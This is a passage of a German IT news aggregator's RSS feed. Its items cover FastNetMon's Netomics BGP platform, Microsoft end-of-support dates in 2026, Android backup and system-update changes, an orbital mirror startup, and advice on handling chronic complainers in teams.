<guid isPermaLink="true">https://tsecurity.de/de/3664791/it-security-nachrichten/fastnetmon-eliminates-third-party-bgp-lookups-with-netomics/</guid>
<pubDate>Mon, 13 Jul 2026 11:38:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>FastNetMon is introducing Netomics, a self-hosted BGP routing intelligence platform that combines live routing data, registry information, RPKI validation, routing history and AI-assisted querying into a single application. Built for internet service providers (ISPs), cloud providers, Internet Exchange Points (IXPs) and enterprises operating large IP networks, Netomics provides complete visibility into global internet routing without relying on third-party lookup services. Network engineers often need to consult multiple public tools to investigate routing incidents, validate prefix … <a href="https://www.helpnetsecurity.com/2026/07/13/fastnetmon-netomics/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/13/fastnetmon-netomics/">FastNetMon eliminates third-party bgp lookups with Netomics</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mit Spiegeln im All: Dieses Startup darf trotz Kritik die Nacht auf der Erde zum Tag machen]]></title>
<description><![CDATA[Ein Raumfahrt-Startup hat die Freigabe für ein ungewöhnliches Projekt bekommen. Sie wollen die Sonne auf die dunkle Seite der Erde reflektieren. Wozu das nützlich sein soll und warum es daran Kritik gibt.
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3664745/it-nachrichten/mit-spiegeln-im-all-dieses-startup-darf-trotz-kritik-die-nacht-auf-der-erde-zum-tag-machen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664745/it-nachrichten/mit-spiegeln-im-all-dieses-startup-darf-trotz-kritik-die-nacht-auf-der-erde-zum-tag-machen/</guid>
<pubDate>Mon, 13 Jul 2026 11:17:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein Raumfahrt-Startup hat die Freigabe für ein ungewöhnliches Projekt bekommen. Sie wollen die Sonne auf die dunkle Seite der Erde reflektieren. Wozu das nützlich sein soll und warum es daran Kritik gibt.
<a href="https://t3n.de/news/spiegel-all-startup-trotz-kritik-nacht-zum-tag-1752522/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft stellt 2026 diese Programme ein – darunter Windows- und Office-Versionen]]></title>
<description><![CDATA[Microsoft stellt 2026 den Support für zahlreiche Produkte ein, die noch auf Millionen von Rechnern laufen. Das bedeutet: Alle diese Programme werden unsicher, weil Microsoft darin keine Sicherheitslücken mehr schließt. Ein Programm stirbt sogar komplett. Und nein: Es handelt sich dabei nicht um W...]]></description>
<link>https://tsecurity.de/de/3664585/it-nachrichten/microsoft-stellt-2026-diese-programme-ein-darunter-windows-und-office-versionen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664585/it-nachrichten/microsoft-stellt-2026-diese-programme-ein-darunter-windows-und-office-versionen/</guid>
<pubDate>Mon, 13 Jul 2026 10:03:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft stellt 2026 den Support für zahlreiche Produkte ein, die noch auf Millionen von Rechnern laufen. Das bedeutet: Alle diese Programme werden unsicher, weil Microsoft darin keine Sicherheitslücken mehr schließt. Ein Programm stirbt sogar komplett. Und nein: <a href="https://www.pcwelt.de/article/3177497/windows-10-bekommt-ein-weiteres-jahr-lang-updates-sensation.html" target="_blank" rel="noreferrer noopener">Es handelt sich dabei nicht um Windows 10.</a></p>



<h2 class="wp-block-heading">Windows 11 24H2 Home und Pro</h2>



<p>So stellt Microsoft in diesem Jahr den Support für Windows 11 24H2 Pro und Home ein, wie Sie <a href="https://learn.microsoft.com/en-us/lifecycle/products/windows-11-home-and-pro">hier</a> bei Microsoft nachlesen können. Am 13. Oktober 2026 wird das der Fall sein. Dann erscheint nämlich das nächste große Windows-11-Update <a href="https://www.pcwelt.de/article/3057061/windows-11-26h2-auf-diese-neuerungen-durfen-sie-sich-freuen.html" target="_blank" rel="noreferrer noopener">26H2</a> – <a href="https://www.pcwelt.de/article/3171365/26h2-so-winzig-wird-das-naechste-grosse-windows-11-update.html" target="_blank" rel="noreferrer noopener">das übrigens nur einen winzigen Download erfordert </a>– und dementsprechend beendet Microsoft die Unterstützung für die vorletzte Windows-11-Version. Das war auch 2025 schon der Fall, damals endete im Herbst der Support für Windows 11 23H2.</p>



<p>Am 13. Oktober 2026, dem Microsoft-Patchday, erhalten Sie also das letzte Mal Updates für 24H2. Spätestens an diesem Tag sollten Sie auf eine neuere Windowsversion wie <a href="https://www.pcwelt.de/article/2873230/windows-11-25h2-alle-details-zu-allen-neuerungen.html" target="_blank" rel="noreferrer noopener">25H2</a> updaten. </p>



<p><em><strong>Übrigens</strong>: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<p>Windows 11 24H2, das <a href="https://www.pcwelt.de/article/2410219/windows-11-24h2-update-neuerungen.html" target="_blank" rel="noreferrer noopener">diese neuen Funktionen</a> auf den Rechner brachte, hatte nach seinem Erscheinen bei vielen Nutzern für Kopfzerbrechen gesorgt. Bei einigen Nutzern<a href="https://www.pcwelt.de/article/2502389/windows-11-24h2-update-zur-problemloesung-scheitert-schon-bei-der-installation.html" target="_blank" rel="noreferrer noopener"> scheiterte bereits die Installation,</a> bei anderen <a href="https://www.pcwelt.de/article/2859995/windows-11-24h2-bereitet-ernste-probleme-wie-microsoft-bestaetigt-loesung.html" target="_blank" rel="noreferrer noopener">Nutzern hagelte es Fehlermeldungen </a>und die Rechner machten urplötzlich Neustarts. Die Taskleiste konnte auf den Windows-PCs einfrieren. Bei einigen Spielen sank die Framerate.</p>



<p>Office-Programme ließen sich teilweise nicht mehr <a href="https://www.pcwelt.de/article/2510888/windows-11-24h2-und-virusprogramm-machen-office-anwendungen-unbrauchbar.html" target="_blank" rel="noreferrer noopener">unter Windows 11 24H2 verwenden.</a> Microsoft <a href="https://www.pcwelt.de/article/2495558/windows-11-24h2-microsoft-stoppt-problem-update-wegen-weiterer-fehler.html" target="_blank" rel="noreferrer noopener">stoppte</a> zwischenzeitlich sogar die Auslieferung von 24H2.</p>



<p>Ebenfalls vom Supportende betroffen sind <strong>Windows Server 2012/Windows Server 2012 R2</strong>. Für diese gibt es <a href="https://learn.microsoft.com/en-us/windows-server/get-started/extended-security-updates-overview">ab 13.10.2026 </a>keine Extended Security Updates mehr.</p>



<h2 class="wp-block-heading">Windows 11 SE stirbt ebenfalls</h2>



<p>Das Supportende für Windows 11 24H2 hat eine spezielle Nebenwirkung: Damit stirbt endgültig auch Windows 11 SE. </p>



<p>Dieses Windows 11 SE hatte Microsoft im November 2021 als Alternative zu Googles Chrome OS <a href="https://www.pcwelt.de/article/1199871/microsoft-enthuellt-windows-11-se-und-surface-laptop-se.html" target="_blank" rel="noreferrer noopener">angepriesen</a>, doch Windows 11 SE konnte sich am Markt nicht durchsetzen. SE war vor allem für günstige Notebooks im Schuleinsatz gedacht. Wir <a href="https://www.pcwelt.de/article/1199871/microsoft-enthuellt-windows-11-se-und-surface-laptop-se.html" target="_blank" rel="noreferrer noopener">schrieben</a> im November 2021:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Windows 11 SE soll ein ablenkungsfreies Arbeiten ermöglichen und zudem möglichst sicher sein und Geräte mit Windows 11 SE sollen sich von Administratoren möglichst einfach verwalten lassen. So bietet Windows 11 SE eine überwachte App-Installation (es kann also nicht jeder Schüler einfach jede beliebige App installieren), App-Start im Vollbildmodus, das standardmäßige Speichern von Dateien im Cloudspeicher (wofür 1 TB Speicherplatz pro Gerät vorhanden ist) und eine laut Microsoft besonders lange Akkulaufzeit. Microsoft 365 ist vorinstalliert. Zudem sollen sich über den Browser Edge viele webbasierte Lernapps nutzen lassen. Populäre Drittanbieter-Apps wie Zoom oder Chrome funktionieren mit Windows 11 SE ebenfalls. Updates für Windows 11 SE werden automatisch im Hintergrund installiert.</p>
</blockquote>



<p>Im Oktober 2026 stellt Microsoft dafür das letzte Mal Updates bereit, wie Sie <a href="https://learn.microsoft.com/en-us/education/windows/windows-11-se-overview">hier</a> nachlesen können. Nach diesem Datum bekommen Sie für Windows 11 SE weder Updates noch Hilfestellung bei Problemen. Überraschend kommt das Ende aber nicht, bereits im August 2025 haben wir darüber <a href="https://www.pcwelt.de/article/2866727/microsoft-stellt-die-produktion-von-windows-11-se-ein.html" target="_blank" rel="noreferrer noopener">berichtet</a>.</p>



<p>Das letzten Herbst erschienene <a href="https://www.pcwelt.de/article/2873230/windows-11-25h2-alle-details-zu-allen-neuerungen.html" target="_blank" rel="noreferrer noopener">Windows 11 25H2 </a>bekommt übrigens Updates bis 12. Oktober 2027.</p>



<h2 class="wp-block-heading">Windows 11 23H2: Letzte Versionen fallen aus dem Support</h2>



<p>Am 10. November 2026 kommt auch das <a href="https://learn.microsoft.com/en-us/lifecycle/products/windows-11-enterprise-and-education?source=recommendations">Ende</a> für Windows 11 23H2 Enterprise, Education and IoT Enterprise. Für Windows Windows 11 23H2 Home und Pro <a href="https://www.pcwelt.de/article/2961139/heute-am-11-11-2025-windows-11-23h2-home-pro-microsoft-beendet-support.html" target="_blank" rel="noreferrer noopener">war bereits im November 2025 Schluss.</a></p>



<h2 class="wp-block-heading">Support für Microsoft Office 2021 endet</h2>



<p>Das im Oktober 2021 erschienene <a href="https://www.pcwelt.de/article/1201768/test-office-2021-die-neuerungen-im-ueberblick.html" target="_blank" rel="noreferrer noopener">Office 2021,</a> der Vorgänger des aktuellen <a href="https://www.pcwelt.de/article/2268334/microsoft-office-2024-release-abo-zwang-windows-10-support-preis.html" target="_blank" rel="noreferrer noopener">Office 2024</a>, fliegt am 13. Oktober 2026 ebenfalls aus dem Support. An diesem Tag stellt Microsoft zudem den Support für Office LTSC 2021 und Office LTSC 2021 für den Mac ein, wie die US-IT-Nachrichtenseite Windowslatest <a href="https://www.windowslatest.com/2026/07/12/microsoft-is-killing-15-products-in-2026-including-windows-11-24h2-and-office-2021/" target="_blank" rel="noreferrer noopener">berichtet</a>.</p>



<p>Sie können Microsoft Office 2021 zwar auch nach dem Supportende weiterverwenden, allerdings bleiben neu entdeckte Sicherheitslücken ungeschlossen. Das sollten Sie nicht riskieren.</p>



<p>Betroffene Kunden sollten also auf Microsoft Office 2024 (Einmalzahlung ohne Abo; nur Sicherheits-Updates) oder auf Microsoft 365 (Abo; Updates bringen auch neue Funktionen) wechseln, um auch weiterhin Sicherheits-Updates zu erhalten. Für Office 2024 bietet Microsoft aber keine günstige Upgrade-Lösung, sondern Sie müssen die aktuelle Office-Generation zum vollen Preis erwerben.</p>



<p><a href="https://amazon.de/dp/B0DK2CTXZJ?tag=pcwelt.de-21&amp;ascsubtag=rss">Microsoft Office Home 2024 bekommen Sie hier bei Amazon für 119,99 Euro.</a> Die Abo-Variante Microsoft 365 Single für 1 Person <a href="https://amazon.de/dp/B0CNFNMCHS?tag=pcwelt.de-21&amp;ascsubtag=rss">erhalten Sie auf Amazon für 76,90 Euro.</a> Die Lizenz dafür müssen Sie nach 12 Monaten aber kostenpflichtig verlängern.</p>



<p>Von dem Aus ebenfalls betroffen ist SQL Server 2016 – <a href="https://learn.microsoft.com/en-us/lifecycle/products/sql-server-2016?branch=live">und zwar bereits am 14. Juli. </a>Also morgen. Ebenfalls morgen endet der Support für<a href="https://learn.microsoft.com/en-us/lifecycle/products/sharepoint-server-2016"> SharePoint Server 2016</a> und 2019, sowie für Project Server 2016 und 2019. </p>



<h2 class="wp-block-heading">Microsoft Publisher stirbt komplett</h2>



<p>Microsoft Publisher ist ein Sonderfall. Denn dafür stellt Microsoft <a href="https://learn.microsoft.com/en-us/lifecycle/products/publisher-2021">nicht nur den Support ein</a>, <a href="https://support.microsoft.com/en-us/publisher/microsoft-publisher-will-no-longer-be-supported-after-october-2026">sondern beendet dieses Programm vollständig. </a>Microsoft entfernt Publisher aus Microsoft 365. Publisher-Dateien lassen sich danach von Microsoft-365-Abonnenten nicht mehr öffnen oder bearbeiten. Lokal auf dem Rechner installierte Publisher-Installationen laufen natürlich auch weiterhin. Microsoft empfiehlt bisherigen Publisher-Nutzern den Umstieg auf Word oder Powerpoint.</p>



<p><a href="https://learn.microsoft.com/de-de/lifecycle/end-of-support/end-of-support-2026">Hier </a>hat Microsoft eine Liste aller Programme veröffentlicht, die 2026 ihren Support verlieren. Die Seite Windowslatest hat zu allen eingestellten Programmen <a href="https://www.windowslatest.com/2026/07/12/microsoft-is-killing-15-products-in-2026-including-windows-11-24h2-and-office-2021/">hier</a> noch Hinweise ergänzt.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Diese neuen Funktionen bekommen Android-Nutzer im Juli]]></title>
<description><![CDATA[Google ist aktuell dabei, ein neues Google-Play-System-Update auszurollen. Damit erhalten Android-Nutzer monatlich neue Funktionen, die einen direkten Einfluss auf ihr Smartphone haben (unabhängig vom Hersteller).



Die Seite 9to5Google hat die wichtigsten Neuerungen zusammengefasst. Demnach bek...]]></description>
<link>https://tsecurity.de/de/3664410/it-nachrichten/diese-neuen-funktionen-bekommen-android-nutzer-im-juli/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664410/it-nachrichten/diese-neuen-funktionen-bekommen-android-nutzer-im-juli/</guid>
<pubDate>Mon, 13 Jul 2026 08:32:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google ist aktuell dabei, ein neues Google-Play-System-Update auszurollen. Damit erhalten Android-Nutzer monatlich neue Funktionen, die einen direkten Einfluss auf ihr <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">Smartphone </a>haben (unabhängig vom Hersteller).</p>



<p>Die Seite <a href="https://9to5google.com/2026/07/09/android-documents-backup/" target="_blank" rel="noreferrer noopener">9to5Google</a> hat die wichtigsten Neuerungen zusammengefasst. Demnach bekommen Android-Nutzer die Option, die Sicherung von SMS-, MMS- und RCS-Nachrichten direkt zu steuern. Das ähnelt der <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">separaten Backup-Einstellung für ausgewählte Apps</a>, die wir Ihnen letzte Woche vorgestellt hatten.</p>



<p>Über <strong>Einstellungen &gt; Konten und Sicherung &gt; Google-Sicherung &gt; Weitere Gerätedaten</strong> gibt es nach Erhalt des Updates einen neuen Ein-/Aus-Schalter für SMS- und MMS-Nachrichten, Anrufverlauf und Geräteeinstellungen. Sie haben also deutlich mehr Kontrolle darüber, welche Daten Sie über die Google-Cloud speichern wollen.</p>



<p>Das ist auch besonders wichtig, da Google seit Neuestem <a href="https://www.pcwelt.de/article/3185747/google-erlaubt-android-nutzern-ab-sofort-kein-kostenloses-backup-mehr-speicherplatz-angererechnet.html" target="_blank" rel="noreferrer noopener">keine Gratis-Backups für Android-Geräte mehr erlaubt</a>. Jedes Backup Ihres Smartphones zählt also direkt auf Ihr verfügbares Speicherkontingent ein, das in der Gratis-Variante gerade einmal 15 GB sind.</p>



<p>Zusätzlich führt Android nun die lokale Sicherung von Dokumenten ein. Damit können Sie Ihre heruntergeladenen Dokumente automatisch in Google Drive speichern, damit diese sicher und von jedem Ihrer Geräte aus zugänglich sind. Auf der Seite „Sicherung“ erscheint dann neben „Fotos &amp; Videos“ und „Sonstige Gerätedaten“ ein neues Menü namens „Dokumente“.</p>



<p>Google erklärt, dass zu den unterstützten Dateiformaten .DOC, .PPT, .XLS, .PDF “und alle anderen auf diesem Gerät gespeicherten Dokumente” gehören. Dokumente sollen bei der Übertragung zwischen Ihrem Gerät und den Google-Diensten verschlüsselt werden. Änderungen, die an den Dokumenten an einem Ort vorgenommen werden, werden nicht mit anderen Orten synchronisiert.</p>



<h3 class="wp-block-heading">Mehr Neuerungen</h3>



<p>In den <a href="https://support.google.com/product-documentation/answer/14343500?hl=de" target="_blank" rel="noreferrer noopener">Versionshinweisen zu den Google-Systemdiensten</a> finden sich noch mehr kleine Neuerungen, die jetzt an Android-Nutzer ausgerollt werden. Dazu gehören unter anderem die Überarbeitung von In-App-Käufen mithilfe einer “verbesserten, nativen Storefront für Google One”, die Übertragung von Arbeitsprofilen auf Wear-OS-Smartwatches, eine neue Google-Standortfreigabe für Chromebooks sowie „neue Funktionen für Entwickler von Google- und Drittanbieter-Apps zur Unterstützung von Prozessen in ihren Apps im Zusammenhang mit Google Maps”.</p>



<p>All diese neuen Funktionen werden seit dem 6. Juli an Android-Nutzer verteilt. Über <strong>Einstellungen</strong> <strong>&gt;</strong> <strong>Sicherheit und Datenschutz</strong> <strong>&gt;</strong> <strong>Updates</strong> <strong>&gt;</strong> <strong>Google Play-Systemupdate</strong> können Sie die aktuell installierte Version der Google Play System Updates prüfen und gegebenenfalls auf eine neue Version aktualisieren.</p>



<p><a href="https://www.pcwelt.de/article/3092158/android-17-diese-smartphones-bekommen-das-update-komplette-geraeteliste.html" target="_blank" rel="noreferrer noopener">Android 17: Diese Smartphones bekommen das Update</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google erlaubt Android-Nutzern ab sofort kein Gratis-Backup mehr]]></title>
<description><![CDATA[Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite Engadget berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.



Für neue...]]></description>
<link>https://tsecurity.de/de/3664378/it-nachrichten/google-erlaubt-android-nutzern-ab-sofort-kein-gratis-backup-mehr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664378/it-nachrichten/google-erlaubt-android-nutzern-ab-sofort-kein-gratis-backup-mehr/</guid>
<pubDate>Mon, 13 Jul 2026 08:17:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite <a href="https://www.engadget.com/2209189/google-will-now-count-all-android-backup-data-toward-your-storage-cap/">Engadget</a> berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.</p>



<p>Für neue Android-Nutzer tritt die Änderung ab heute, 7. Juli 2026, in Kraft. Für bestehende Nutzer wird sie in den kommenden Monaten schrittweise eingeführt.</p>



<p>Laut Google werden die Auswirkungen dieser Änderung voraussichtlich begrenzt sein. Android-Sicherungskopien werden im Durchschnitt etwa 40 Megabyte zusätzlichen Speicherplatz beanspruchen. Gleichzeitig werden weitere Einstellungen eingeführt, die den Nutzern mehr Kontrolle darüber geben, was gesichert wird.</p>



<p>Zuvor wurde etwa bekannt, <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">dass Android-Nutzer eine wichtige neue Backup-Funktion erhalten</a>, mit der sie selbst entscheiden können, welche App-Daten gesichert werden sollen und welche nicht. Demnächst möchte Google noch einführen, dass Nutzer ihre Geräteeinstellungen, den Anrufverlauf sowie SMS- und MMS-Nachrichten aus dem Sicherungsvorgang ausschließen können.</p>



<p>Es ist erwähnenswert, dass Google im Mai gleichzeitig den kostenlosen Speicherplatz für neue Konten <a href="https://www.pcwelt.de/article/3140205/googles-gratis-onlinespeicher-schrumpft-falls-sie-google-nicht-ihre-telefonnummer-verraten-test.html" target="_blank" rel="noreferrer noopener">von 15 Gigabyte auf 5 Gigabyte reduziert hat.</a> Es sei denn, der Nutzer verknüpft eine Telefonnummer mit dem Konto.</p>



<p>Je nachdem, wie viele Daten Sie bereits in der Google Cloud gesichert haben, könnte es also eng werden, selbst wenn die Sicherung nur wenige MB groß ist. Oder Sie merken von der Änderung nicht wirklich viel, da Sie ohnehin auf andere Backup-Methoden setzen.</p>



<p>Ein Upgrade auf 100 GB in <a href="https://one.google.com/about/plans?hl=de&amp;g1_landing_page=60" target="_blank" rel="noreferrer noopener">Google One</a> kostet 1,99 Euro monatlich, 2,99 Euro für 200 GB oder 9,99 Euro monatlich für 2 TB Speicherplatz. Mit enthalten ist auch der Zugriff auf “neue und leistungsstarke Funktionen” in Google Gemini.</p>



<p><a href="https://www.pcwelt.de/article/3006100/die-besten-online-backup-dienste-im-vergleich-2.html" target="_blank" rel="noreferrer noopener">Die besten Online-Backup-Dienste im Vergleich: Nie mehr Daten verlieren</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Schwierige Mitarbeiter: Hilfe, ein Nörgler lähmt mein Team!]]></title>
<description><![CDATA[Wenn toxische Kollegen den Teamgeist in seinen Grundfesten erschüttern, sollten Führungskräfte einschreiten.
					Foto: Andrey Popov – shutterstock.com




Mit Kolleginnen und Kollegen zusammenzuarbeiten, die ständig schlechte Laune haben und sich über alles beschweren, ist lästig und nervenaufre...]]></description>
<link>https://tsecurity.de/de/3664128/it-security-nachrichten/schwierige-mitarbeiter-hilfe-ein-noergler-laehmt-mein-team/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664128/it-security-nachrichten/schwierige-mitarbeiter-hilfe-ein-noergler-laehmt-mein-team/</guid>
<pubDate>Mon, 13 Jul 2026 05:06:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Wenn toxische Kollegen den Teamgeist in seinen Grundfesten erschüttern, sollten Führungskräfte einschreiten." title="Wenn toxische Kollegen den Teamgeist in seinen Grundfesten erschüttern, sollten Führungskräfte einschreiten." src="https://images.computerwoche.de/bdb/3303020/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Wenn toxische Kollegen den Teamgeist in seinen Grundfesten erschüttern, sollten Führungskräfte einschreiten.</p></figcaption></figure><p class="imageCredit">
					Foto: Andrey Popov – shutterstock.com</p></div>




<p>Mit Kolleginnen und Kollegen zusammenzuarbeiten, die ständig schlechte Laune haben und sich über alles beschweren, <a href="https://www.computerwoche.de/article/2743092/wenn-kollegen-gift-fuers-teamwork-sind.html" title="ist lästig und nervenaufreibend" target="_blank">ist lästig und nervenaufreibend</a>. Den Nörglern ist nichts gut genug: Führungskräfte sind unfähig, Kollegen faul oder überfordert und auch an den Kunden gibt es ständig etwas auszusetzen. Sie sind unverschämt und erwarten zu viel. Für Unternehmen sind solche Meckerer gefährlich. Die <a href="https://www.computerwoche.de/article/2794006/wie-widerstand-projekte-pusht.html" title="negative Energie" target="_blank">negative Energie</a>, die sie ausstrahlen, kann die Teamarbeit lähmen, Kunden und Partner vergraulen und auf lange Sicht die <a href="https://www.computerwoche.de/article/2773339/was-manager-wissen-muessen.html" title="Unternehmenskultur" target="_blank">Unternehmenskultur</a> angreifen.</p>



<p>Der natürliche Reflex im Umgang mit solchen Misanthropen besteht in den meisten Unternehmen und Abteilungen darin, derartige Nebengeräusche erst einmal zu überhören, darüber zu schmunzeln oder sie als Lappalien abzutun. Manche Abteilungsleiter versuchen auch, die Querulanten auf ihre Seite zu ziehen, indem sie ihnen Informationen vorab geben, damit besagte Kollegen sich involviert fühlen und nicht querschießen.</p>



<h3 class="wp-block-heading">Wie Nörgler verstummen</h3>



<p>Beide Ansätze sind suboptimal: Anstatt sich mit dem Störenfried zu arrangieren oder ihn aus taktischen Gründen zu bevorzugen, sollten Vorgesetzte sich darauf konzentrieren, dieses offenkundige Fehlverhalten abzustellen. Immerhin geht es nicht nur um den Frieden im Team, sondern auch darum, als <a href="https://www.computerwoche.de/article/2799025/gute-fuehrungskraefte-muessen-lernen-sich-selbst-zu-fuehren.html" title="Führungskraft" target="_blank">Führungskraft</a> glaubwürdig zu bleiben.</p>



<p>Wie also kann man chronischen Nörglern und Jammerern das Handwerk legen? Zunächst einmal ist es wichtig einen Konsens im Team darüber zu haben, welches Verhalten am Arbeitsplatz alle für begrüßenswert halten und was jede(r) Einzelne dazu beitragen sollte. Klar formulierte Werte sind die Basis für jede Abteilungskultur. Gibt es im Team hier keinen Konsens, scheint alles erlaubt. Manche Mitarbeiter werden dann versuchen, nach ihren eigenen Werten zu leben und diese auch für andere durchzusetzen.</p>



<p>Wer Beschwerden hinter vorgehaltener Hand verhindern will, sollte zudem auf <a href="https://www.computerwoche.de/article/2760885/blicken-sie-hinter-die-zahlen.html" title="Transparenz" target="_blank">Transparenz</a> setzen. Teammitglieder müssen Gelegenheit haben, ihre Bedenken über Regeln, Programme oder Aktivitäten in der Gruppe zu äußern. Halten sie im großen Kreis mit ihrer Meinung hinterm Berg, haben sie kaum die Legitimation, sich in kleiner Runde oder unter vier Augen zu beklagen. Zu groß ist ihr Risiko gefragt zu werden: Warum hast Du denn nichts gesagt? Es ist also unbedingt sinnvoll, Missstände offen anzusprechen und alle Beteiligten aufzufordern, Maßnahmen zu ihrer Behebung vorzuschlagen. Zudem sollte jeder wissen, dass es einer <a href="https://www.computerwoche.de/article/2777433/digitale-transformation-ist-kein-it-projekt.html" title="Teamkultur" target="_blank">Teamkultur</a> nicht zuträglich ist, wenn sich Einzelne hinter den Kulissen beschweren.</p>



<p>Führungskräfte sollten ihr Team kennen und wissen, wer die Quengler sind, die meistens außerhalb ihrer Hörweite agieren und möglichst unsichtbar bleiben wollen. Direkte Gespräche mit allen, auch formelle Umfragen sowie 360-Grad-Reviews können hier Klarheit bringen. Diese Nähe zum Team ist für Führungskräfte auch eine wichtige Präventivmaßnahme. Immer dann, wenn Vorgesetzte zu stark auf Distanz zu den Mitarbeitenden gehen, nutzen die Beschwerdeführer das Vakuum für sich. Also gilt es, Kontakt zu jedem Teammitglied zu halten, konstruktives Feedback zu geben und auch die Stimmung in der Arbeitsgruppe immer mal wieder für sich zu analysieren und bewerten.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<h3 class="wp-block-heading">Kommunikation frisst Negativität</h3>



<p>Lassen sich Muster erkennen, worüber sich Mitarbeiter immer wieder beschweren, ist klares Feedback angesagt. Die schnelle, konstruktive Auseinandersetzung auf der Fachebene ist die Basis, genauso wichtig ist es aber, dem Betreffenden klar zu machen, was er mit seinem launischen Verhalten bewirkt. Dazu gilt es zu verdeutlichen, wie andauernde Mäkeleien dem Arbeitsumfeld schaden, wie sich Leistung und Moral negativ verändern und auch, wie es den Quenglern selbst in ihrem Arbeitsumfeld und auch in ihrem beruflichen Fortkommen schadet, wenn sie immer nur <a href="https://www.computerwoche.de/article/2795315/konflikte-in-innovationskraft-wandeln.html" title="Misstöne erzeugen" target="_blank">Misstöne erzeugen</a>. Dabei sollten Vorgesetzte klar machen, dass kritischer Input zu Programmen, Richtlinien oder Aktivitäten am Arbeitsplatz immer gewünscht ist. Allerdings kommt es dabei auf den Kreis der Adressaten und den Ton an, in dem kommuniziert wird.</p>



<p>Wenn alle gut gemeinten Führungs- und Motivationsmaßnahmen nicht fruchten, müssen Vorgesetzte auch mal Klartext reden und – am besten unterstützt von der Personalabteilung – ein ernsthaftes Krisengespräch führen. Wichtig dabei ist zu dokumentieren, dass man es vorher schon im Guten versucht hat: Feedback-Gespräche und Coachings haben stattgefunden, aber nicht gefruchtet. Ziel eines Krisengesprächs sollte ein klares Programm zur Leistungs- und Verhaltensverbesserung sein, das Ziele benennt und Fortschritte dokumentiert.</p>



<p>Haben all diese Maßnahmen keinen Erfolg, sollten sich Vorgesetzte nicht scheuen, die Reißleine zu ziehen und die betreffende Person zu entlassen. Chronische Nörgler sind nur auf den ersten Blick harmlos, auf lange Sicht zerstören sie die Arbeitsatmosphäre und -kultur. Als Verantwortliche können Sie sich immer damit trösten, dass die betreffende Person im Unternehmen ohnehin <a href="https://www.computerwoche.de/article/2751806/die-grosse-gefahr-der-inneren-kuendigung.html" title="nicht glücklich war" target="_blank">nicht glücklich war</a>.</p>



<div class="foundryDgalleryWrapper" data-foundry-gallery-id="116798"><h3>Die 5 schlimmsten Kollegen</h3><div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der Über-Versprecher" title="Der Über-Versprecher" src="https://images.computerwoche.de/bdb/2677936/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der Über-Versprecher</p></figcaption></figure><p class="imageCredit">
